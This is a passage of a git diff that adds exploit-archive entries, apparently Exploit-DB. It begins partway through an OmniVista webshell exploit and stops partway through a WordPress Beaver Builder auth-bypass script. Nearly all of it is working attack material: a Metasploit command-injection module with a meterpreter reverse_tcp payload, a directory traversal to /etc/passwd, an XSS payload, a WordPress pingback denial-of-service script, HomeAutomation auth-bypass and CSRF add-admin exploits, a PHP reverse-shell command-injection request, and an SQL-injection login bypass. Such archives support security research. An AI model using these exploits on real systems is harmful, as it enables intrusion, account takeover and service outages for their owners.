+			self.password = self.decodepassword(self.getpassword())
+			print('[*] {} password is "{}"'.format(self.username, self.password))
+			if self.checkldap():
+				print('[*] LDAP Service is accessible!')
+				self.connectldap()
+				print('[*] Changing AdminNmc password')
+				self.editadminpassword()
+				print('[*] Logging in')
+				if self.login():
+					self.exploit8770()
+					output = self.exec8770("whoami")
+					print('[*] Webshell at {}{}{}'.format(self.host, "themes/Theme2/", self.filename))
+					print('[*] Command output: '.format(output))
+				else:
+					print("[x] Directory license not installed :/")
+					return False
+			else:
+				print("[x] LDAP Service is not directly accessible")
+				return False
+
+		else:
+			print("[x] Target is not an OmniVista 4760/8770")
+			return False
+
+if len(sys.argv) != 2:
+	print("Usage: ./omnivista.py http(s)://target.tld:port/")
+else:
+	exploit = OmniVista(sys.argv[1])
+	exploit.autoexploit()
\ No newline at end of file
diff --git a/exploits/php/webapps/47772.rb b/exploits/php/webapps/47772.rb
new file mode 100755
index 000000000..a32129343
--- /dev/null
+++ b/exploits/php/webapps/47772.rb
@@ -0,0 +1,104 @@
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'            => 'OpenNetAdmin Ping Command Injection',
+      'Description'     => %q{
+        This module exploits a command injection in OpenNetAdmin between 8.5.14 and 18.1.1.
+      },
+      'Author'          =>
+        [
+          'mattpascoe', # Vulnerability discovery
+          'Onur ER <onur@onurer.net>' # Metasploit module
+        ],
+      'References'      =>
+        [
+          ['EDB', '47691']
+        ],
+      'DisclosureDate'  => '2019-11-19',
+      'License'         => MSF_LICENSE,
+      'Platform'        => 'linux',
+      'Arch'            => [ARCH_X86, ARCH_X64],
+      'Privileged'      => false,
+      'Targets'         =>
+        [
+          ['Automatic Target', {}]
+        ],
+      'DefaultOptions'  =>
+        {
+          'RPORT'   => 80,
+          'payload' => 'linux/x86/meterpreter/reverse_tcp'
+        },
+      'DefaultTarget'   => 0))
+
+    register_options(
+      [
+        OptString.new('VHOST', [false, 'HTTP server virtual host']),
+        OptString.new('TARGETURI', [true, 'Base path', '/ona/login.php'])
+      ]
+    )
+  end
+
+  def check
+    res = send_request_cgi({
+      'method'        => 'POST',
+      'uri'           => normalize_uri(target_uri.path),
+      'ctype'         => 'application/x-www-form-urlencoded',
+      'encode_params' => false,
+      'vars_post'     => {
+        'xajax'       => 'window_open',
+        'xajaxargs[]' => 'app_about'
+      }
+     })
+
+    unless res
+      vprint_error 'Connection failed'
+      return CheckCode::Unknown
+    end
+
+    unless res.body =~ /OpenNetAdmin/i
+      return CheckCode::Safe
+    end
+
+    opennetadmin_version = res.body.scan(/OpenNetAdmin - v([\d\.]+)/).flatten.first
+    version = Gem::Version.new('opennetadmin_version')
+
+    if version
+      vprint_status "OpenNetAdmin version #{version}"
+    end
+
+    if version >= Gem::Version.new('8.5.14') && version <= Gem::Version.new('18.1.1')
+      return CheckCode::Appears
+    end
+
+    CheckCode::Detected
+  end
+
+  def exploit
+    print_status('Exploiting...')
+    execute_cmdstager(flavor: :printf)
+  end
+
+  def filter_bad_chars(cmd)
+    cmd.gsub!(/chmod \+x/, 'chmod 777')
+  end
+
+  def execute_command(cmd, opts = {})
+    post_data = "xajax=window_submit&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;#{filter_bad_chars(cmd)};&xajaxargs[]=ping"
+
+    begin
+      send_request_cgi({
+        'method'        => 'POST',
+        'uri'           => normalize_uri(target_uri.path),
+        'ctype'         => 'application/x-www-form-urlencoded',
+        'encode_params' => false,
+        'data'          => post_data
+      })
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
+    end
+  end
+end
\ No newline at end of file
diff --git a/exploits/php/webapps/47773.txt b/exploits/php/webapps/47773.txt
new file mode 100644
index 000000000..742fb93d7
--- /dev/null
+++ b/exploits/php/webapps/47773.txt
@@ -0,0 +1,21 @@
+# Title: Bullwark Momentum Series JAWS 1.0 - Directory Traversal
+# Date: 2019-12-11
+# Author: Numan Türle
+# Vendor Homepage: http://www.bullwark.net/
+# Version : Bullwark Momentum Series Web Server JAWS/1.0
+# Software Link : http://www.bullwark.net/Kategoriler.aspx?KategoriID=24
+
+POC
+---------
+
+GET /../../../../../../../../../../../../etc/passwd HTTP/1.1
+Host: 12.0.0.1
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
+Accept-Encoding: gzip, deflate
+Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
+Connection: close
+
+Response
+---------
+
+root:ABgia2Z.lfFhA:0:0::/root:/bin/sh
\ No newline at end of file
diff --git a/exploits/php/webapps/47798.txt b/exploits/php/webapps/47798.txt
new file mode 100644
index 000000000..9aa27638e
--- /dev/null
+++ b/exploits/php/webapps/47798.txt
@@ -0,0 +1,17 @@
+# Exploit Title: phpMyChat-Plus 1.98 - 'pmc_username' Reflected Cross-Site Scripting
+# Date: 2019-12-19
+# Exploit Author: Chris Inzinga
+# Vendor Homepage: http://ciprianmp.com/latest/
+# Download: https://sourceforge.net/projects/phpmychat/
+# Tested On: Linux & Mac
+# Version: 1.98
+# CVE: CVE-2019-19908
+
+Description: 
+The "pmc_username" parameter of pass_reset.php is vulnerable to reflected XSS
+
+Payload: 
+"><script>alert('xss')</script>
+
+Vulnerable URL: 
+http://localhost/plus/pass_reset.php?L=english&pmc_username="><script>alert('xss')</script>
\ No newline at end of file
diff --git a/exploits/php/webapps/47800.py b/exploits/php/webapps/47800.py
new file mode 100755
index 000000000..dbdd22977
--- /dev/null
+++ b/exploits/php/webapps/47800.py
@@ -0,0 +1,103 @@
+#!/usr/bin/env python
+# WordPress <= 5.3.? Denial-of-Service PoC
+# Abusing pingbacks+xmlrpc multicall to exhaust connections
+# @roddux 2019 | Arcturus Security | labs.arcturus.net
+# TODO:
+# - Try and detect a pingback URL on target site
+# - Optimise number of entries per request, check class-wp-xmlrpc-server.php
+from urllib.parse import urlparse
+import sys, uuid, urllib3, requests
+urllib3.disable_warnings()
+
+DEBUG = True 
+def dprint(X):
+	if DEBUG: print(X)
+
+COUNT=0
+def build_entry(pingback,target):
+	global COUNT
+	COUNT +=1
+	entry  = "<value><struct><member><name>methodName</name><value>pingback.ping</value></member><member>"
+	entry += f"<name>params</name><value><array><data><value>{pingback}/{COUNT}</value>"
+	#entry += f"<name>params</name><value><array><data><value>{pingback}/{uuid.uuid4()}</value>"
+	entry += f"<value>{target}/?p=1</value></data></array></value></member></struct></value>"
+	#entry += f"<value>{target}/#e</value></data></array></value></member></struct></value>" # taxes DB more
+	return entry
+
+def build_request(pingback,target,entries):
+	prefix   = "<methodCall><methodName>system.multicall</methodName><params><param><array>"
+	suffix   = "</array></param></params></methodCall>"
+	request  = prefix
+	for _ in range(0,entries): request += build_entry(pingback,target)
+	request += suffix
+	return request
+
+def usage_die():
+	print(f"[!] Usage: {sys.argv[0]} <check/attack> <pingback url> <target url>")
+	exit(1)
+	
+def get_args():
+	if len(sys.argv) != 4: usage_die()
+	action   = sys.argv[1]
+	pingback = sys.argv[2]
+	target   = sys.argv[3]
+	if action not in ("check","attack"): usage_die()
+	for URL in (pingback,target):
+		res = urlparse(URL)
+		if not all((res.scheme,res.netloc)): usage_die()
+	return (action,pingback,target)
+
+def main(action,pingback,target):
+	print("[>] WordPress <= 5.3.? Denial-of-Service PoC")
+	print("[>] @roddux 2019 | Arcturus Security | labs.arcturus.net")
+	# he checc
+	if action == "check":    entries = 2
+	# he attacc
+	elif action == "attack": entries = 2000
+	# but most importantly
+	print(f"[+] Running in {action} mode")
+	# he pingbacc
+	print(f"[+] Got pingback URL \"{pingback}\"")
+	print(f"[+] Got target URL \"{target}\"")
+	print(f"[+] Building {entries} pingback calls")
+	# entries = 1000 # TESTING
+	xmldata = build_request(pingback,target,entries)
+	dprint("[+] Request:\n")
+	dprint(xmldata+"\n")
+	print(f"[+] Request size: {len(xmldata)} bytes")
+	if action == "attack":
+		print("[+] Starting attack loop, CTRL+C to stop...")
+		rcount = 0
+		try:
+			while True:
+					try:
+						resp  = requests.post(f"{target}/xmlrpc.php", xmldata, verify=False, allow_redirects=False, timeout=.2)
+						#dprint(resp.content.decode("UTF-8")[0:500]+"\n")
+						if resp.status_code != 200:
+							print(f"[!] Received odd status ({resp.status_code}) -- DoS successful?")
+					except (requests.exceptions.Timeout, requests.exceptions.ConnectionError) as e:
+						pass
+					rcount += 1
+					print(f"\r[+] Requests sent: {rcount}",end="")
+		except KeyboardInterrupt:
+			print("\n[>] Attack finished",end="\n\n")
+			exit(0)
+	elif action == "check":
+		print("[+] Sending check request")
+		try:
+			resp = requests.post(f"{target}/xmlrpc.php", xmldata, verify=False, allow_redirects=False, timeout=10)
+			if resp.status_code != 200:
+				print(f"[!] Received odd status ({resp.status_code}) -- check target url")
+			print("[+] Request sent")
+			print("[+] Response headers:\n")
+			print(resp.headers)
+			print("[+] Response dump:")
+			print(resp.content.decode("UTF-8"))
+			print("[+] Here's the part where you figure out if it's vulnerable, because I CBA to code it")
+		except (requests.exceptions.Timeout, requests.exceptions.ConnectionError) as e:
+			print("[!] Connection error")
+			exit(1)
+		print("[>] Check finished")
+
+if __name__ == "__main__":
+	main(*get_args())
\ No newline at end of file
diff --git a/exploits/php/webapps/47807.txt b/exploits/php/webapps/47807.txt
new file mode 100644
index 000000000..b01877fa8
--- /dev/null
+++ b/exploits/php/webapps/47807.txt
@@ -0,0 +1,248 @@
+# Exploit: HomeAutomation 3.3.2 - Authentication Bypass
+# Date: 2019-12-30
+# Author: LiquidWorm
+# Vendor: Tom Rosenback and Daniel Malmgren
+# Product web page: http://karpero.mine.nu/ha/
+# Affected version: 3.3.2
+# Tested on: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips
+# Advisory ID: ZSL-2019-5557
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5557.php
+
+
+HomeAutomation v3.3.2 Authentication Bypass Exploit
+
+
+Vendor: Tom Rosenback and Daniel Malmgren
+Product web page: http://karpero.mine.nu/ha/
+Affected version: 3.3.2
+
+Summary: HomeAutomation is an open-source web interface and scheduling solution.
+It was initially made for use with the Telldus TellStick, but is now based on a
+plugin system and except for Tellstick it also comes with support for Crestron,
+OWFS and Z-Wave (using OpenZWave). It controls your devices (switches, dimmers,
+etc.) based on an advanced scheduling system, taking into account things like
+measurements from various sensors. With the houseplan view you can get a simple
+overview of the status of your devices at their location in your house.
+
+Desc: The application suffers from an authentication bypass vulnerability when
+spoofing client IP address using the X-Forwarded-For header with the local (loopback)
+IP address value allowing remote control of the smart home solution.
+
+===============================================================================
+/modules/login/login.module.php:
+--------------------------------
+19: if(!defined("HomeAutomationIncluded")) { die("HomeAutomation: Direct access not premitted"); }
+20:
+21: if($_SESSION[CFG_SESSION_KEY]["userlevel"] < 1 && $action == "default" && isIpLocal() && getFormVariable("autologin", "") == "")
+22: {
+23:         // if user is not logged in and action is default, user is visiting locally and autologin is NOT set, allow autologin.
+24:         $action = "login";
+25: }
+26:
+27: ?>
+
+===============================================================================
+/functions.php:
+---------------
+733: function isIpLocal() {
+734: 
+735: 	if(substr(getIpAddress(), 0, 4) == "127.") {
+736: 		return true;
+737: 	}
+738: 
+739: 	$isIpLocal = false;
+740: 
+741: 	$localip = $_SESSION[CFG_SESSION_KEY]["settings"]["localip"];
+742: 
+743: 	$localnets = explode(";", $localip);
+744: 	foreach($localnets as $localnet) {
+745: 		list($localnet, $localmask) = explode("/", $localnet);
+746: 		if($localmask == "") {
+747: 			$localmask = 32;
+748: 		}
+749: 		if($localmask == "" || $localmask > 32 || $localmask < 0) {
+750: 			$localmask = 32;
+751: 		}
+752: 
+753: 		// $mask = $localmask;
+754: 
+755: 		$localnet = ip2long($localnet);
+756: 		$localmask = ~((1 << (32-$localmask)) - 1);
+757: 		$remoteip = ip2long(getIpAddress());
+758: 		$maskedip = $remoteip & $localmask;
+759: 		$maskednet = $localnet & $localmask;
+760: 
+761: 		// echo "<br />localnet:";
+762: 		// printf('%1$32b', $localnet);
+763: 
+764: 		// echo "<br />localmask: (dec: ".$mask.")";
+765: 		// printf('%1$32b', $localmask);
+766: 
+767: 		// echo "<br />remoteip:";
+768: 		// printf('%1$32b', $remoteip);
+769: 
+770: 		// echo "<br />maskedip:";
+771: 		// printf('%1$32b', $maskedip);
+772: 
+773: 		// echo "<br />maskednet:";
+774: 		// printf('%1$32b', $maskednet);
+775: 
+776: 		if($maskedip == $maskednet) {
+777: 			// echo "<br />maskedip == maskednet";
+778: 			$isIpLocal = true;
+779: 			break;
+780: 		}
+781: 	}
+782: 	// $isIpLocal = false;
+783: 	return $isIpLocal;
+784: }
+785: 
+786: function getIpAddress() {
+787: 	return isset($_SERVER["HTTP_X_FORWARDED_FOR"]) ? $_SERVER["HTTP_X_FORWARDED_FOR"] : $_SERVER["REMOTE_ADDR"];
+788: }
+===============================================================================
+
+Tested on: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips
+           Apache/2.4.29 (Ubuntu)
+           PHP/7.4.0RC4
+           PHP/7.3.11
+           PHP 7.2.24-0ubuntu0.18.04.1
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2019-5557
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5557.php
+
+
+06.11.2019
+
+--
+
+
+PoC auth bypass and arbitrary cookie setup grepping auth'd content view:
+------------------------------------------------------------------------
+
+root@kali:~/homeautomation# curl -sk --user-agent "ZSL/0.2 (SpoofDetect 1.0)" https://192.168.2.113/index.php -H "X-Forwarded-For: 127.31.33.7" -vL --cookie "PHPSESSID=11111111110000000000666666" |grep Macros
+*   Trying 192.168.2.113...
+* Connected to 192.168.2.113 (192.168.2.113) port 443 (#0)
+* found 173 certificates in /etc/ssl/certs/ca-certificates.crt
+* found 696 certificates in /etc/ssl/certs
+* ALPN, offering h2
+* ALPN, offering http/1.1
+* SSL connection using TLS1.2 / ECDHE_RSA_AES_128_GCM_SHA256
+* 	 server certificate verification SKIPPED
+* 	 server certificate status verification SKIPPED
+* 	 common name: n28.nux.se (does not match '192.168.2.113')
+* 	 server certificate expiration date OK
+* 	 server certificate activation date OK
+* 	 certificate public key: RSA
+* 	 certificate version: #3
+* 	 subject: CN=n28.nux.se
+* 	 start date: Mon, 21 Oct 2019 12:18:27 GMT
+* 	 expire date: Sun, 19 Jan 2020 12:18:27 GMT
+* 	 issuer: C=US,O=Let's Encrypt,CN=Let's Encrypt Authority X3
+* 	 compression: NULL
+* ALPN, server accepted to use http/1.1
+> GET /index.php HTTP/1.1
+> Host: 192.168.2.113
+> User-Agent: ZSL/0.2 (SpoofDetect 1.0)
+> Accept: */*
+> Cookie: PHPSESSID=11111111110000000000666666
+> X-Forwarded-For: 127.31.33.7
+> 
+< HTTP/1.1 303 See Other
+< Date: Wed, 20 Nov 2019 01:06:16 GMT
+< Server: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips
+< X-Powered-By: PHP/7.3.11
+< Expires: Thu, 19 Nov 1981 08:52:00 GMT
+< Cache-Control: no-store, no-cache, must-revalidate
+< Pragma: no-cache
+< Strict-Transport-Security: max-age=63072000; includeSubdomains
+< X-Frame-Options: DENY
+< X-Content-Type-Options: nosniff
+< Location: ./index.php?page=houseplan
+< Content-Length: 0
+< Content-Type: text/html; charset=UTF-8
+< 
+* Connection #0 to host 192.168.2.113 left intact
+* Issue another request to this URL: 'https://192.168.2.113/index.php?page=houseplan'
+* Found bundle for host 192.168.2.113: 0x55c160ef7c40 [can pipeline]
+* Re-using existing connection! (#0) with host 192.168.2.113
+* Connected to 192.168.2.113 (192.168.2.113) port 443 (#0)
+> GET /index.php?page=houseplan HTTP/1.1
+> Host: 192.168.2.113
+> User-Agent: ZSL/0.2 (SpoofDetect 1.0)
+> Accept: */*
+> Cookie: PHPSESSID=11111111110000000000666666
+> X-Forwarded-For: 127.31.33.7
+> 
+< HTTP/1.1 200 OK
+< Date: Wed, 20 Nov 2019 01:06:16 GMT
+< Server: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips
+< X-Powered-By: PHP/7.3.11
+< Expires: Thu, 19 Nov 1981 08:52:00 GMT
+< Cache-Control: no-store, no-cache, must-revalidate
+< Pragma: no-cache
+< Strict-Transport-Security: max-age=63072000; includeSubdomains
+< X-Frame-Options: DENY
+< X-Content-Type-Options: nosniff
+< Transfer-Encoding: chunked
+< Content-Type: text/html; charset=UTF-8
+< 
+{ [6 bytes data]
+*							</li><li>| <a href="./index.php?page=macros">Macros</a>
+ Connection #0 to host 192.168.2.113 left intact
+root@kali:~/homeautomation# curl -sk --user-agent "ZSL/0.2 (SpoofDetect 1.0)" https://192.168.2.113/index.php -vL --cookie "PHPSESSID=11111111110000000000666666" |grep Macros
+*   Trying 192.168.2.113...
+* Connected to 192.168.2.113 (192.168.2.113) port 443 (#0)
+* found 173 certificates in /etc/ssl/certs/ca-certificates.crt
+* found 696 certificates in /etc/ssl/certs
+* ALPN, offering h2
+* ALPN, offering http/1.1
+* SSL connection using TLS1.2 / ECDHE_RSA_AES_128_GCM_SHA256
+* 	 server certificate verification SKIPPED
+* 	 server certificate status verification SKIPPED
+* 	 common name: n28.nux.se (does not match '192.168.2.113')
+* 	 server certificate expiration date OK
+* 	 server certificate activation date OK
+* 	 certificate public key: RSA
+* 	 certificate version: #3
+* 	 subject: CN=n28.nux.se
+* 	 start date: Mon, 21 Oct 2019 12:18:27 GMT
+* 	 expire date: Sun, 19 Jan 2020 12:18:27 GMT
+* 	 issuer: C=US,O=Let's Encrypt,CN=Let's Encrypt Authority X3
+* 	 compression: NULL
+* ALPN, server accepted to use http/1.1
+> GET /index.php HTTP/1.1
+> Host: 192.168.2.113
+> User-Agent: ZSL/0.2 (SpoofDetect 1.0)
+> Accept: */*
+> Cookie: PHPSESSID=11111111110000000000666666
+> 
+< HTTP/1.1 200 OK
+< Date: Wed, 20 Nov 2019 01:06:25 GMT
+< Server: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips
+< X-Powered-By: PHP/7.3.11
+< Expires: Thu, 19 Nov 1981 08:52:00 GMT
+< Cache-Control: no-store, no-cache, must-revalidate
+< Pragma: no-cache
+< Strict-Transport-Security: max-age=63072000; includeSubdomains
+< X-Frame-Options: DENY
+< X-Content-Type-Options: nosniff
+< Transfer-Encoding: chunked
+< Content-Type: text/html; charset=UTF-8
+< 
+{ [6 bytes data]
+							</li><li>| <a href="./index.php?page=macros">Macros</a>
+* Connection #0 to host 192.168.2.113 left intact
+root@kali:~/homeautomation# 
+
+
+PoC auth bypass retrieving valid Cookie:
+-----------------------------------------
+
+root@kali:~/homeautomation# $(curl -sk --user-agent "ZSL/0.2 (SpoofDetect 1.0)" https://192.168.2.113/?page=houseplan -L -H "X-Forwarded-For: 127.1.1.1" --cookie-jar cookies.txt -o /dev/null) ; echo -ne "Your cookie: " ;tail -c -27 cookies.txt
+Your cookie: k4dic6crpr4d4u71tr13gvtmsv
\ No newline at end of file
diff --git a/exploits/php/webapps/47808.txt b/exploits/php/webapps/47808.txt
new file mode 100644
index 000000000..f2a147d88
--- /dev/null
+++ b/exploits/php/webapps/47808.txt
@@ -0,0 +1,68 @@
+# Exploit: HomeAutomation 3.3.2 - Cross-Site Request Forgery (Add Admin)
+# Date: 2019-12-30
+# Author: LiquidWorm
+# Vendor: Tom Rosenback and Daniel Malmgren
+# Product web page: http://karpero.mine.nu/ha/
+# Affected version: 3.3.2
+# Tested on: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips
+# Advisory ID: ZSL-2019-5558
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5558.php
+
+
+HomeAutomation v3.3.2 CSRF Add Admin Exploit
+
+
+Vendor: Tom Rosenback and Daniel Malmgren
+Product web page: http://karpero.mine.nu/ha/
+Affected version: 3.3.2
+
+Summary: HomeAutomation is an open-source web interface and scheduling solution.
+It was initially made for use with the Telldus TellStick, but is now based on a
+plugin system and except for Tellstick it also comes with support for Crestron,
+OWFS and Z-Wave (using OpenZWave). It controls your devices (switches, dimmers,
+etc.) based on an advanced scheduling system, taking into account things like
+measurements from various sensors. With the houseplan view you can get a simple
+overview of the status of your devices at their location in your house.
+
+Desc: The application interface allows users to perform certain actions via HTTP
+requests without performing any validity checks to verify the requests. This can
+be exploited to perform certain actions with administrative privileges if a logged-in
+user visits a malicious web site.
+
+Tested on: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips
+           Apache/2.4.29 (Ubuntu)
+           PHP/7.4.0RC4
+           PHP/7.3.11
+           PHP 7.2.24-0ubuntu0.18.04.1
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2019-5558
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5558.php
+
+
+06.11.2019
+
+--
+
+
+<html>
+  <body>
+    <form action="http://localhost/homeautomation_v3_3_2/?page=conf-usercontrol" method="POST">
+      <input type="hidden" name="id" value="-1" />
+      <input type="hidden" name="action" value="save" />
+      <input type="hidden" name="editable" value="2" />
+      <input type="hidden" name="username" value="testingus" />
+      <input type="hidden" name="password" value="123456" />
+      <input type="hidden" name="firstname" value="Tester" />
+      <input type="hidden" name="lastname" value="Testovski" />
+      <input type="hidden" name="email" value="test@zeroscience.mk" />
+      <input type="hidden" name="userlevel" value="3" />
+      <input type="hidden" name="save" value="Save" />
+      <input type="submit" value="Addmoi" />
+    </form>
+  </body>
+</html>
\ No newline at end of file
diff --git a/exploits/php/webapps/47809.txt b/exploits/php/webapps/47809.txt
new file mode 100644
index 000000000..1858917f7
--- /dev/null
+++ b/exploits/php/webapps/47809.txt
@@ -0,0 +1,96 @@
+# Exploit: HomeAutomation 3.3.2 - Remote Code Execution
+# Date: 2019-12-30
+# Author: LiquidWorm
+# Vendor: Tom Rosenback and Daniel Malmgren
+# Product web page: http://karpero.mine.nu/ha/
+# Affected version: 3.3.2
+# Tested on: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips
+# Advisory ID: ZSL-2019-5560
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5560.php
+
+HomeAutomation v3.3.2 CSRF Remote Command Execution (PHP Reverse Shell) PoC
+
+Vendor: Tom Rosenback and Daniel Malmgren
+Product web page: http://karpero.mine.nu/ha/
+Affected version: 3.3.2
+
+Summary: HomeAutomation is an open-source web interface and scheduling solution.
+It was initially made for use with the Telldus TellStick, but is now based on a
+plugin system and except for Tellstick it also comes with support for Crestron,
+OWFS and Z-Wave (using OpenZWave). It controls your devices (switches, dimmers,
+etc.) based on an advanced scheduling system, taking into account things like
+measurements from various sensors. With the houseplan view you can get a simple
+overview of the status of your devices at their location in your house.
+
+Desc: The application suffers from an authenticated OS command execution vulnerability
+using custom command v0.1 plugin. This can be exploited with CSRF vulnerability to
+execute arbitrary shell commands as the web user via the 'set_command_on' and 'set_command_off'
+POST parameters in '/system/systemplugins/customcommand/customcommand.plugin.php' by
+using an unsanitized PHP exec() function.
+
+===============================================================================
+/system/systemplugins/customcommand/customcommand.plugin.php:
+-------------------------------------------------------------
+
+77: 	function toggleDevices($devicesToToggle, $statuses) {
+78: 		$output = array();
+79: 		$command = "";
+80: 
+81: 		foreach($devicesToToggle as $device)
+82: 		{
+83: 			$status = $statuses[$device["id"]];
+84: 			if($status == 0) {
+85: 				$command = $this->getSettings("command_off");
+86: 			} else {
+87: 				$command = $this->getSettings("command_on");
+88: 			}
+89: 
+90: 			if(!empty($command)) {
+91: 				$command = replaceCustomStrings($command, $device, $statuses[$device["id"]]);
+92: 
+93: 				exec($command, $output);
+94: 
+95: 				SaveLog("Command: ".$command."\nOutput:\n".parseExecOutputToString($output));
+96: 			}
+97: 		}
+98: 
+99: 		return "";
+100: 	}
+===============================================================================
+
+Tested on: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips
+           Apache/2.4.29 (Ubuntu)
+           PHP/7.4.0RC4
+           PHP/7.3.11
+           PHP 7.2.24-0ubuntu0.18.04.1
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2019-5560
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5560.php
+
+
+06.11.2019
+
+--
+
+
+POST /homeautomation_v3_3_2/?page=conf-systemplugins HTTP/1.1
+
+plugin=customcommand&action=savesettings&set_command_on=php+-r+%27%24sock%3Dfsockopen%28%22127.0.0.1%22%2C4444%29%3Bexec%28%22%2Fbin%2Fsh+-i+%3C%263+%3E%263+2%3E%263%22%29%3B%27&set_command_off=&savesettings=Save
+
+-
+
+lqwrm@metalgear:/$ nc -lvp 4444
+Listening on [0.0.0.0] (family 0, port 4444)
+Connection from localhost 40724 received!
+/bin/sh: 0: can't access tty; job control turned off
+$ id
+uid=33(www-data) gid=33(www-data) groups=33(www-data)
+$ pwd
+/var/www/html/homeautomation_v3_3_2
+$ exit
+lqwrm@metalgear:/$
\ No newline at end of file
diff --git a/exploits/php/webapps/47814.txt b/exploits/php/webapps/47814.txt
new file mode 100644
index 000000000..2630808dc
--- /dev/null
+++ b/exploits/php/webapps/47814.txt
@@ -0,0 +1,66 @@
+# Exploit: Thrive Smart Home 1.1 - Authentication Bypass
+# Date: 2019-12-30
+# Author: LiquidWorm
+# Vendor: Thrive
+# Product web page: http://www.thrivesmarthomes.com
+# Affected version: 1.1
+# Tested on: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips
+# Advisory ID: ZSL-2019-5554
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5554.php
+
+
+Thrive Smart Home v1.1 SQL Injection Authentication Bypass
+
+
+Vendor: Thrive
+Product web page: http://www.thrivesmarthomes.com
+Affected version: 1.1
+
+Summary: As smart home technology becomes more affordable and easy to
+install with services offered by Thrive Smart Homes, there are some
+great options available to give your home a high-tech makeover. If the
+convenience of feeding your cat or turning on your air conditioning with
+a tap on your smartphone isn't enough of a reason to make the investment,
+consider how conveniently you can protect your home and belongings. From
+Wi-Fi-equipped smoke detectors to plugs with auto turn-offs, smart homes
+with their always-on connectivity and notifications systems allow consumers
+to quickly respond to the unexpected. For instance, if you install a smart
+water leak and moisture monitoring device, you can set up alerts on your
+phone for unusual changes in moisture and stop leaks before they cause major
+flooding or mold. It's a convenient way to proactively protect your home
+from costly damage, whether it's an overflowing laundry tub, a cracked
+washer hose, or a leaky water heater.
+
+Desc: The application suffers from an SQL Injection vulnerability. Input
+passed through 'user' POST parameter in checklogin.php is not properly
+sanitised before being returned to the user or used in SQL queries. This
+can be exploited to manipulate SQL queries by injecting arbitrary SQL
+code and bypass the authentication mechanism.
+
+Tested on: Apache httpd 2.4.25 (Raspbian)
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2019-5554
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5554.php
+
+
+21.10.2019
+
+--
+
+
+$ curl http://192.168.1.1:8080/raspberry/include/checklogin.php -X POST -d"submit=LOGIN&user=' or 1=1#&pass=pass" -i
+HTTP/1.1 302 Found
+Date: Mon, 21 Oct 2019 23:35:18 GMT
+Server: Apache/2.4.25 (Raspbian)
+Set-Cookie: PHPSESSID=6cu3frj0qes9c96v5de5vp37e2; path=/
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+location: ../home.php
+Content-Length: 1
+Content-Type: text/html; charset=UTF-8
\ No newline at end of file
diff --git a/exploits/php/webapps/47832.py b/exploits/php/webapps/47832.py
new file mode 100755
index 000000000..7346aefa9
--- /dev/null
+++ b/exploits/php/webapps/47832.py
@@ -0,0 +1,76 @@
+# Exploit Title: Wordpress Ultimate Addons for Beaver Builder 1.2.4.1 - Authentication Bypass
+# Date: 2019-12-21
+# Exploit Authors: Raphael Karger & Nathan Hrncirik
+# Vendor Homepage: https://www.ultimatebeaver.com/
+# Version: Ultimate Addons for Beaver Builder < 1.2.4.1
+'''
+
+Requirements:
+    * Valid Admin/User Email Needs to be Known
+    * Social Media Login Form has to be Embedded in the Specified URL
+
+'''
+
+#!/usr/bin/python3
+
+import requests
+import urllib.parse
+import json
+import argparse
+
+banner = r''' ____ ___  _____ _______________________________              .__         .__  __   
+|    |   \/  _  \\______   \______   \_   _____/__  _________ |  |   ____ |__|/  |_ 
+|    |   /  /_\  \|    |  _/|    |  _/|    __)_\  \/  /\____ \|  |  /  _ \|  \   __\
+|    |  /    |    \    |   \|    |   \|        \>    < |  |_> >  |_(  <_> )  ||  |  
+|______/\____|__  /______  /|______  /_______  /__/\_ \|   __/|____/\____/|__||__|  
+                \/       \/        \/        \/      \/|__|                         
+Ultimate Addons for Beaver Builder < 1.2.4.1 - Authentication Bypass
+'''
+
+class exploit(object):
+    def __init__(self, page, email):
+        self.page = page
+        self.sess = requests.Session()
+        self.email = email
+        self.nonce = False
+
+    def get_nonce(self):
+        try:
+            nonce_req = self.sess.get(self.page)
+            if nonce_req.text.find("data-nonce=") != -1:
+                self.nonce = nonce_req.text.split("data-nonce=")[1].split(">")[0]
+        except Exception as e:
+            print("Nonce Error: {}".format(e))
+
+    def auth_bypass(self):
+        try:
+            schema = urllib.parse.urlparse(self.page)
+            resp = self.sess.post("{}://{}/wp-admin/admin-ajax.php".format(schema.scheme, schema.netloc), data={
+                    "action" : "uabb-lf-google-submit",
+                    "name" : "raphaelrocks",
